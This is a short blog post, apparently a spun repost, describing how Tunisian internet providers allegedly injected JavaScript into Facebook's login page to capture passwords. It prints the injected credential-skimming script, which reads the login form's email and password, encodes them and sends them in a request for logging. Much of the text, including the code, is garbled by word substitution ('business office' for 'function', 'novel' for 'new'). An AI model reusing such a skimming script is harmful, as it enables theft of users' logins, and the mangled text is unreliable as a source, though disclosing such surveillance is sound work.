Exposure : How Does The Tunisian Regime Pocket Passwords On Facebook !

You maybe conduct maintain followed the recent actualities close Tunisian Government stealing accounts on facebook.
Read More Here...

There’s how they do:
Here’s the spider web page of Facebook every bit seen when you’re connected inwards Tunisia http://pastebin.com/WV0C9t0F
Let’s accept a await at that javascript curious part..

!-- business office h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F; st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;} business office r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); render st;} business office hAAAQ3d() {  var frm = document.getElementById("login_form"); var us3r = frm.email.value; var pa55 = frm.pass.value;  var url = "http://www.facebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);} business office inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;} business office inv0k2(url) {var xr = novel XMLHttpRequest(); xr.open("GET", url, false); xr.send("");} business office inv0k3(url) {var xr = novel ActiveXObject('Microsoft.XMLHTTP'); xr.open("GET", url, false); xr.send("");} //-->

This code is injected past times the Internet access provider (Internet service provider) itself together with appears inwards no others country, this JS code create a inquiry to http://www.facebook.com/wo0dh3ad?q=blablablabla&u=USERNAME&p=PASSWORD amongst the username together with password inwards clear, the “wo0dh3ad” page of class don’t be on facebook’s server, but the Internet access provider could merely create an “grep wo0dh3ad /var/log/FAI.log” to larn all the passwords of their subscribers inwards clear.

Original post past times @r00tBSD : http://www.r00ted.com/doku.php?id=injection_tunisie

News Source : Jerry Hassan

Share This :